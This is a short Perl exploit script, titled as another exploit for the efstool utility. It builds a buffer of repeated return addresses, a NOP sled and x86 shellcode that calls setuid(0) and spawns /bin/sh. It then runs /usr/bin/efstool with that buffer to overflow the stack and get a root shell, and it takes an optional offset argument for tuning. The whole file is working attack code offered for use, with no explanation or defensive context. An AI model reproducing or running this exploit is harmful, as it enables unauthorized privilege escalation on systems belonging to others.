#!/usr/bin/perl
 # Another efstool exploit 

 $shell = 
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89".
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89".
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";


 $ret =0xbfffe590;
 $buf = 3000;
 $egg = 2000;
 $nop = "\x90";
 $offset = 0;

 if (@ARGV == 1) { $offset = $ARGV[0]; }

 $addr = pack('l', ($ret + $offset));
 for ($i = 0; $i < $buf; $i += 4) {
  $buffer .= $addr;
 }

 for ($i = 0; $i < ($egg - length($shell) - 100); $i++) {
  $buffer .= $nop;              
 }                              
                                
 $buffer .= $shell;             
 exec("/usr/bin/efstool $buffer");